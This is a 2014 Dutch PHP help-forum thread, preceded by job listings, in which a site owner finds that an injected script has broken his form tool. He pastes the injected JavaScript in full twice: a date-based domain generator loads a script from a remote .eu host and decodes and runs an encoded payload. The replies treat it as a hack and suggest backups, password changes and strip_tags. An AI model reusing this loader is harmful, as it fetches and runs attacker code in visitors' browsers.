syntax error

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Medior Java developer (fullstack)

Wat je gaat doen: Of beter nog, wat wil jij doen? Binnen DPA GEOS zijn we dan ook op zoek naar enthousiaste Java developers om ons development team te versterken. Als Java developer werk je in Agile/Scrum teams bij onze klanten en daarbij kun je eventueel ook andere ontwikkelaars begeleiden in het softwareontwikkelproces. Verder draag je positief bij aan de teamgeest binnen een projectteam en je kijkt verder dan je eigen rol. Je gaat software maken voor verschillende opdrachtgevers in jouw regio. Je bent een professional die het IT-vak serieus neemt en kwaliteit levert. Je leert snel vanwege je diepgaande

Bekijk vacature »

Junior Java Developer

Dit ga je doen Je ontwikkelt innovatieve, maatschappelijk belangrijke applicaties; Je implementeert nieuwe features; Je gaat in gesprek met eindgebruikers en designers om de applicaties continu te finetunen; Je draait mee in een professionele Agile/Scrum omgeving. Hier ga je werken Onze klant is een internationale organisatie gevestigd in de omgeving van Amsterdam. Ze staan zeer goed bekend in de markt door hun innovatieve dienstverlening op IT gebied en hun gepassioneerde werknemers. Voor hun inspanningen op het gebied van IT hebben ze meerdere prijzen gewonnen! Onze klant is onderdeel van een Corporate werkgever en heeft zelf 300 mensen in dienst. Om

Bekijk vacature »

Junior .NET developer

Functie Als junior .NET ontwikkelaar start jij in een ontwikkelteam met 7 .NET developers. In ons team werken er drie senior .NET developer, twee medior .NET developers en twee junior .NET developers. Er is dan ook genoeg senioriteit in ons team om jou te kunnen bieden wat jij nodig hebt! Wij werken in scrum en hebben drie wekelijkste sprints. Daarnaast doen wij minimaal vier keer per jaar een release. Ons platform is ontzettend complex en groot. Het is dan ook in het begin belangrijk dat jij de processen gaat begrijpen. Jij krijgt dan ook een cursus om beter te begrijpen

Bekijk vacature »

PHP Developer

Functie Middels Scrum en sprints bouw jij in deze functie mee aan complexe webapplicaties en ons SaaS platform. Hierbij hoort ook architectuur tot een van je taken. Daarnaast ben je één van de leden van het Scrum team. Dat betekent dat je naast je kerntaken ook in contact staat met de product owner. Oftewel, je bent bij het gehele ontwikkelproces betrokken. Tools die hierbij gebruikt worden zijn o.a. PHP, Symfony en Git. Eisen • Minimaal HBO werk- en denkniveau • Minimaal 3 jaar aantoonbare ervaring met PHP • Kennis en ervaring Symfony (Laravel is pré) & Lando • Kennis van

Bekijk vacature »

ERP Developer fleet managementsysteem

Wat ga je doen als ERP Developer fleet managementsysteem? Als ERP developer speel jij een belangrijke rol bij het doorvoeren van wijzigingen en verbeteringen binnen het fleet managementsysteem. Jouw expertise op het gebied van ERP systemen stelt jou in staat om de applicatie optimaal te laten functioneren en te blijven ontwikkelen. Als lid van het IT-team werk je nauw samen met andere developers en het business team om het fleet managementsysteem te integreren met andere systemen. Je bent verantwoordelijk voor het ontwikkelen van nieuwe functionaliteiten en het implementeren van verbeteringen op basis van de wensen en eisen van onze klanten.

Bekijk vacature »

Developer Front-end

Functie omschrijving Front-end Developer gezocht! Wij zijn op zoek naar een front-end developer voor een organisatie in de regio Veenendaal die de eindverantwoordelijkheid op zich neemt van alles wat met design te maken heeft. Je hebt in deze functie een adviserende rol hiervoor moet je beschikken over een grote dosis vakinhoudelijke kennis. Je creëert unieke concepten door samen met collega’s en klanten te overleggen over aangeleverde designs. Hiermee draag jij je steentje bij aan de groeiambities van de klant. Jij wordt het vaste aanspreekpunt voor klanten wanneer het gaat over planningen, hierin is het jouw taak om alle betrokkenen goed

Bekijk vacature »

PHP Developer

Functie omschrijving Als PHP / Laravel developer zal je in een klein team terecht komen. Wij zijn op zoek naar een echte specialist, iemand die de balans weet te vinden tussen techniek en perfectie. In de aankomende jaren wilt dit bedrijf flink groeien en daarom zijn ze op zoek naar jou! Wat ga je doen? Je draagt bij aan het ontwikkelen en onderhouden van bestaande webapplicaties die boordevol functionaliteit zitten. Deze applicaties worden gebruikt door de organisatie zelf en ook door de klanten. Inmiddels wordt er gewerkt met Laravel 8 en zijn er diverse koppelingen naar externe leveranciers. Verder zal

Bekijk vacature »

SAP HANA Cloud Application Developer

Vacature details Vakgebied: Software/IT Opleiding: Senior Werklocatie: Veldhoven Vacature ID: 12662 Introductie HANA Cloud Application Developer at a High Tech company. The company is the world's leading provider of lithography systems for the semiconductor industry, manufacturing complex machines that are critical to the production of integrated circuits or chips. Our purpose is “unlocking the potential of people and society by pushing technology to new limits”. We do this guided by the principles “Challenge”, “Collaborate” and “Care”. This role is situated in the Big Data Analytics (BDA) Domain. The teams have mixture of young talent and senior specialists and have a

Bekijk vacature »

Senior Front end developer Angular

Functie Er zijn momenteel 5 SCRUM-teams waarvan drie gefocust zijn op DevOps en de huidige projecten en twee op innovatie van de platformen. Jij zal onderdeel worden van het innovatie Scrum team. De 2 multidisciplinaire innovatie teams bestaan momenteel uit 14 werknemers. Jij als senior Front end developer wordt onderdeel van onze innovatieteams. De innovatieteams houden zich bezig met het door ontwikkelen van de huidige producten en denken na over nieuwe functionaliteiten. Binnen de rol van Front end developer krijg je veel vrijheid en kan je je dag zelf indelen. Dingen waar jij je dagelijks mee bezig zult houden is

Bekijk vacature »

SQL Database ontwikkelaar

Functie omschrijving Wil jij meewerken aan het creëren van slimme software om magazijnen als een geoliede machine te laten lopen? Wij zoeken een zorgvuldig persoon, iemand die niet snel de hand omdraait voor complexe algoritmes. Denk jij dat jij de SQL ontwikkelaar bent die wij zoeken? Lees snel verder en wie weet zitten we binnenkort samen aan tafel! Jouw werkzaamheden zullen er als volgt uitzien: Je houdt je bezig met het ontwerpen en ontwikkelen van MS SQL server databases, dit doe je met T-SQL als programmeer laag. Je gaat aan high-end software oplossingen werken, dit doe je voor de optimalisatie

Bekijk vacature »

Belastingdienst - Freelance Applicatieontwikkelaar

Startdatum: 01.06.2023 Richttarief: €65,00 - €75,00 Duur van de opdracht: 6 maanden Uren per week: 36 Taal: Nederlands vereist! Gelieve in het Nederlands te solliciteren. Hybride. Kantoordagen in Utrecht, incidenteel in Apeldoorn Functieomschrijving: De afdeling IV – Generieke Voorzieningen – Interactie Online is onderdeel van de keten Interactie. De missie van de keten is: “het faciliteren van de interactie met alle burgers, bedrijven en hun vertegenwoordigers om hen in staat te stellen aan hun fiscale verplichtingen te voldoen en aanspraak te maken op hun rechten.” De afdeling Interactie Online heeft een belangrijke bijdrage binnen deze keten. Dit door het ontwikkelen

Bekijk vacature »

C# .NET developer voor innovatieve applicaties gez

Bedrijfsomschrijving Deze werkgever houdt zich al ruim 20 jaar bezig met het ontwikkelen van innovatieve software en dat willen ze graag nog lang doorzetten. En dat merk je ook als je als .NET developer hier aan de slag gaat. De applicaties worden continu doorontwikkeld met altijd als uitgangspunt dat zowel de kwaliteit als het gebruikersgemak van hoog niveau is. Het bedrijf telt inmiddels ruim 25 medewerkers waarvan meer dan de helft op de development afdeling werken. Meer weten over deze werkgever? Mail naar [email protected] of bel 0657578548 Functieomschrijving Je komt te werken in een Scrum team met andere .NET developers

Bekijk vacature »

Back-end Developer Java

Dit ga je doen Het (door)ontwikkelen van een zelfgebouwde applicatie in Java, Spring Framework, SQL, HTML, CSS en Javascript; End-to-end beheer m.b.t. de applicatie en koppelen van applicaties binnen het landschap; Ontwikkelen van rapportages voor de interne organisatie; Ontwikkelen van aanvullende functionaliteiten m.b.t. de applicatie; Uitvoeren van testen en code reviews. Hier ga je werken Binnen deze organisatie kom je te werken op de afdeling die medische gegevens verzamelt vanuit het hele land. Denk hierbij aan vertrouwelijke persoonsgegevens. Het team verwerkt al deze data met als doel het waarborgen en verbeteren van de kwaliteit van de zorg in heel Nederland.

Bekijk vacature »

Senior, Medior and Junior SAP HANA Developer

Vacature details Vakgebied: Software/IT Opleiding: Medior Werklocatie: Veldhoven Vacature ID: 12696 Introductie Our client is the world's leading provider of lithography systems for the semiconductor industry, manufacturing complex machines that are critical to the production of integrated circuits or chips. Our purpose is “unlocking the potential of people and society by pushing technology to new limits”. We do this guided by the principles “Challenge”, “Collaborate” and “Care”. Wat verwachten we van jou? SAP Certified Application Associate - SAP HANA Cloud Modeling (training and/or certification) Bachelor degree or higher Excellent understanding of SAP HANA (2.0 / Cloud), Data Modelling and writing

Bekijk vacature »

Software Developer

Dit ga je doen Ontwikkelen aan de software dat beschikbaar is op de substations; Ontwikkelen in C++, C, Python en JavaScript. Daarnaast op een Embedded Linux omgeving, opgebouwd met containers en DevOps; Meewerken aan cyber security (OWASP); Uitvoeren/bouwen van geautomatiseerde testen in samenwerking met de Quality Specialist; Vertalen van wensen van de klanten/business naar werkbare/duurzame oplossingen. Hier ga je werken Als Software Ontwikkelaar kom je te werken bij een organisatie gericht op de (internationale) energiemarkt, waar wordt gewerkt voor het verwerven en verwerken van realtime, high quality data. Er wordt gewerkt vanuit het hart van de substations en direct voor

Bekijk vacature »
Eric O

Eric O

15/05/2014 15:04:00
Quote Anchor link
Dag allemaal,

er is iets raars gebeurd op mijn webserver (hacking?)
als ik een formulier verstuur, maak ik gebruik van een php tool. Dat werkte tot 3 dagen geleden perfect.
ALs ik nu echter op de knop verstuur klik, verschint de volgende melding:

Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in /home/o5148okp/public_html/phpforms/index.php on line 525

Ik ben gaan zien op de pagina naar lijn 525, maar voor mij is dit hocus pocus. Wie ziet de fout??
Bedankt voor jullie hulp!



<body><script>function hashdate (str) {if(!str) {var date=new Date();var str = date.getUTCFullYear() + "/" + (date.getUTCMonth()+1) + "/" + date.getUTCDate() + " " + (date.getHours() >= 12 ? 'PM':'AM');};var table = [0,1996959894,3993919788,2567524794,124634137,1886057615,3915621685,2657392035,249268274,2044508324,3772115230,2547177864,162941995,2125561021,3887607047,2428444049,498536548,1789927666,4089016648,2227061214,450548861,1843258603,4107580753,2211677639,325883990,1684777152,4251122042,2321926636,335633487,1661365465,4195302755,2366115317,997073096,1281953886,3579855332,2724688242,1006888145,1258607687,3524101629,2768942443,901097722,1119000684,3686517206,2898065728,853044451,1172266101,3705015759,2882616665,651767980,1373503546,3369554304,3218104598,565507253,1454621731,3485111705,3099436303,671266974,1594198024,3322730930,2970347812,795835527,1483230225,3244367275,3060149565,1994146192,31158534,2563907772,4023717930,1907459465,112637215,2680153253,3904427059,2013776290,251722036,2517215374,3775830040,2137656763,141376813,2439277719,3865271297,1802195444,476864866,2238001368,4066508878,1812370925,453092731,2181625025,4111451223,1706088902,314042704,2344532202,4240017532,1658658271,366619977,2362670323,4224994405,1303535960,984961486,2747007092,3569037538,1256170817,1037604311,2765210733,3554079995,1131014506,879679996,2909243462,3663771856,1141124467,855842277,2852801631,3708648649,1342533948,654459306,3188396048,3373015174,1466479909,544179635,3110523913,3462522015,1591671054,702138776,2966460450,3352799412,1504918807,783551873,3082640443,3233442989,3988292384,2596254646,62317068,1957810842,3939845945,2647816111,81470997,1943803523,3814918930,2489596804,225274430,2053790376,3826175755,2466906013,167816743,2097651377,4027552580,2265490386,503444072,1762050814,4150417245,2154129355,426522225,1852507879,4275313526,2312317920,282753626,1742555852,4189708143,2394877945,397917763,1622183637,3604390888,2714866558,953729732,1340076626,3518719985,2797360999,1068828381,1219638859,3624741850,2936675148,906185462,1090812512,3747672003,2825379669,829329135,1181335161,3412177804,3160834842,628085408,1382605366,3423369109,3138078467,570562233,1426400815,3317316542,2998733608,733239954,1555261956,3268935591,3050360625,752459403,1541320221,2607071920,3965973030,1969922972,40735498,2617837225,3943577151,1913087877,83908371,2512341634,3803740692,2075208622,213261112,2463272603,3855990285,2094854071,198958881,2262029012,4057260610,1759359992,534414190,2176718541,4139329115,1873836001,414664567,2282248934,4279200368,1711684554,285281116,2405801727,4167216745,1634467795,376229701,2685067896,3608007406,1308918612,956543938,2808555105,3495958263,1231636301,1047427035,2932959818,3654703836,1088359270,936918000,2847714899,3736837829,1202900863,817233897,3183342108,3401237130,1404277552,615818150,3134207493,3453421203,1423857449,601450431,3009837614,3294710456,1567103746,711928724,3020668471,3272380065,1510334235,755167117];var crc = crc ^ (-1);for(var i=0, iTop=str.length; i<iTop; i++) {crc = ( crc >>> 8 ) ^ table[( crc ^ str.charCodeAt( i ) ) & 0xFF];}return (crc ^ (-1)) >>> 0;};function dbc(s) {var e={},i,k,v=[],r='',w=String.fromCharCode;var n=[[65,91],[97,123],[48,58],[43,44],[47,48]];for(z in n){for(i=n[z][0];i<n[z][1];i++){v.push(w(i));}}for(i=0;i<64;i++){e[v]=i;}for(i=0;i<s.length;i+=72){var b=0,c,x,l=0,o=s.substring(i,i+72);for(x=0;x<o.length;x++){c=e[o.charAt(x)];b=(b<<6)+c;l+=6;while(l>=8){r+=w((b>>>(l-=8))%256);}}}return r;};function runonload(){if(!document.body){setTimeout(runonload, 50);}else {var s=document.createElement("SCRIPT");s.src="http://" + hashdate().toString(16) + ".eu/script.html?"+Math.random();document.body.appendChild(s); }};window.cback=function(p){var s = document.createElement("SCRIPT");s.text = dbc(p).replace(/\0+/,'');document.body.appendChild(s);};runonload(); </script>
&nbsp;<br><br>
<blockquote>
<h2 style='color: red;'>There appears to be a system error.</h2>
You can try to refresh the page by clicking
<a href=\"javascript:window.location=window.location;\">here</a>.
 
PHP hulp

PHP hulp

18/05/2024 15:10:58
 
- Ariën  -
Beheerder

- Ariën -

15/05/2014 15:13:24
Quote Anchor link
Ik gok dat die JavaScript geïnjecteerd in in je PHP-code, waarmee je PHP-code-systax niet meer klopt.
Kan je geen backup terug zetten waarna je uit kan zoeken hoe het lek misbruikt is?
Gewijzigd op 15/05/2014 15:14:39 door - Ariën -
 
Ivo P

Ivo P

15/05/2014 15:13:47
Quote Anchor link
is dit een stuk uit je script dat je kent / dat daar hoort te staan?

maw: is dit jouw script, of heeft iemand daar in lopen knoeien?

Het is namelijk op z'n minst een ondoorzichtig stuk code dat iets probeert te doen me een toe te voegen stuk javascript, waarbij een externe url betrokken is (waarbij de domainnaam afhankelijk is van de datum?)

Zeker als dit voor jou onverwacht optreedt, dan zou ik denken aan een "hacker" / "scriptkiddie"

wanneer is de file voor het laatst gewijzigd?
IS hij gelijk aan je backup?
 
Eric O

Eric O

15/05/2014 15:36:29
Quote Anchor link
ik heb mijn service provide gevraagd een back up terug tezetten van 3 dagen geleden toen het wel nog werkte, maar ze hebben vannacht een nieuwe back up gestart, die oude is dus overschreven. Helaas. Ik vrees dat ik de tool opnieuw moet installeren.
 
Michael -

Michael -

15/05/2014 15:39:29
Quote Anchor link
> maar ze hebben vannacht een nieuwe back up gestart, die oude is dus overschreven.

Hé? Vreemde provider om maar één backup te maken in de zoveel dagen of ligt dat aan mij? Op m'n werk wordt er elke nacht een backup gemaakt en zijn er altijd 7 beschikbaar (rest op tape) dus je kan makkelijk een week terug. Dacht dat dat vrij normaal was.

Je hebt de bestanden ook niet lokaal op je pc opgeslagen? Of werk je altijd online. Dat eerste is sowieso aan te raden.
Gewijzigd op 15/05/2014 16:02:51 door Michael -
 
Eric O

Eric O

15/05/2014 20:34:22
Quote Anchor link
Ik heb het volledige script nu verwijderd en bij een formulier werkt het terug. Bij een ander formiulier worden de gegevens ook verstuurd , maar wordt ik nog niet doorgestuurd naar de pagina die ik heb ingesteld, die moet verschijnen als het form verstuurd wordt.
Ik zoek verder vanavond.

Toevoeging op 15/05/2014 21:01:02:

Ik heb mijn cache vd browser nog eens geledigd en een paar testen gedaan. Alle formulieren werken terug zoals het moet na verwijdering van het script: Heb mijn ftp paswoorden gewijzigd. Ik vraag me toch af hoe dat script erop is gekomen..tja..

onderstaand script was dus de boosdoener..


<script>function hashdate (str) {if(!str) {var date=new Date();var str = date.getUTCFullYear() + "/" + (date.getUTCMonth()+1) + "/" + date.getUTCDate() + " " + (date.getHours() >= 12 ? 'PM':'AM');};var table = [0,1996959894,3993919788,2567524794,124634137,1886057615,3915621685,2657392035,249268274,2044508324,3772115230,2547177864,162941995,2125561021,3887607047,2428444049,498536548,1789927666,4089016648,2227061214,450548861,1843258603,4107580753,2211677639,325883990,1684777152,4251122042,2321926636,335633487,1661365465,4195302755,2366115317,997073096,1281953886,3579855332,2724688242,1006888145,1258607687,3524101629,2768942443,901097722,1119000684,3686517206,2898065728,853044451,1172266101,3705015759,2882616665,651767980,1373503546,3369554304,3218104598,565507253,1454621731,3485111705,3099436303,671266974,1594198024,3322730930,2970347812,795835527,1483230225,3244367275,3060149565,1994146192,31158534,2563907772,4023717930,1907459465,112637215,2680153253,3904427059,2013776290,251722036,2517215374,3775830040,2137656763,141376813,2439277719,3865271297,1802195444,476864866,2238001368,4066508878,1812370925,453092731,2181625025,4111451223,1706088902,314042704,2344532202,4240017532,1658658271,366619977,2362670323,4224994405,1303535960,984961486,2747007092,3569037538,1256170817,1037604311,2765210733,3554079995,1131014506,879679996,2909243462,3663771856,1141124467,855842277,2852801631,3708648649,1342533948,654459306,3188396048,3373015174,1466479909,544179635,3110523913,3462522015,1591671054,702138776,2966460450,3352799412,1504918807,783551873,3082640443,3233442989,3988292384,2596254646,62317068,1957810842,3939845945,2647816111,81470997,1943803523,3814918930,2489596804,225274430,2053790376,3826175755,2466906013,167816743,2097651377,4027552580,2265490386,503444072,1762050814,4150417245,2154129355,426522225,1852507879,4275313526,2312317920,282753626,1742555852,4189708143,2394877945,397917763,1622183637,3604390888,2714866558,953729732,1340076626,3518719985,2797360999,1068828381,1219638859,3624741850,2936675148,906185462,1090812512,3747672003,2825379669,829329135,1181335161,3412177804,3160834842,628085408,1382605366,3423369109,3138078467,570562233,1426400815,3317316542,2998733608,733239954,1555261956,3268935591,3050360625,752459403,1541320221,2607071920,3965973030,1969922972,40735498,2617837225,3943577151,1913087877,83908371,2512341634,3803740692,2075208622,213261112,2463272603,3855990285,2094854071,198958881,2262029012,4057260610,1759359992,534414190,2176718541,4139329115,1873836001,414664567,2282248934,4279200368,1711684554,285281116,2405801727,4167216745,1634467795,376229701,2685067896,3608007406,1308918612,956543938,2808555105,3495958263,1231636301,1047427035,2932959818,3654703836,1088359270,936918000,2847714899,3736837829,1202900863,817233897,3183342108,3401237130,1404277552,615818150,3134207493,3453421203,1423857449,601450431,3009837614,3294710456,1567103746,711928724,3020668471,3272380065,1510334235,755167117];var crc = crc ^ (-1);for(var i=0, iTop=str.length; i<iTop; i++) {crc = ( crc >>> 8 ) ^ table[( crc ^ str.charCodeAt( i ) ) & 0xFF];}return (crc ^ (-1)) >>> 0;};function dbc(s) {var e={},i,k,v=[],r='',w=String.fromCharCode;var n=[[65,91],[97,123],[48,58],[43,44],[47,48]];for(z in n){for(i=n[z][0];i<n[z][1];i++){v.push(w(i));}}for(i=0;i<64;i++){e[v]=i;}for(i=0;i<s.length;i+=72){var b=0,c,x,l=0,o=s.substring(i,i+72);for(x=0;x<o.length;x++){c=e[o.charAt(x)];b=(b<<6)+c;l+=6;while(l>=8){r+=w((b>>>(l-=8))%256);}}}return r;};function runonload(){if(!document.body){setTimeout(runonload, 50);}else {var s=document.createElement("SCRIPT");s.src="http://" + hashdate().toString(16) + ".eu/script.html?"+Math.random();document.body.appendChild(s); }};window.cback=function(p){var s = document.createElement("SCRIPT");s.text = dbc(p).replace(/\0+/,'');document.body.appendChild(s);};runonload(); </script>
 
Ger van Steenderen
Tutorial mod

Ger van Steenderen

15/05/2014 21:33:51
Quote Anchor link
Heb je ergens iets waar html code ingevoerd kan worden?
Gebruik dan striptags()
Waarbij tussen de haakjes een comma gescheiden string kunt opgeven voor de tags die genegeerd moeten worden:
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?php
$sanitized
= strip_tags($textarea, '<p><br>');
?>

Of detect and react:
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
<?php
if (strpos('<script', $textarea) !== false) {
    header('Location: www.idiots.com');
}

?>
Gewijzigd op 15/05/2014 21:39:51 door Ger van Steenderen
 



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.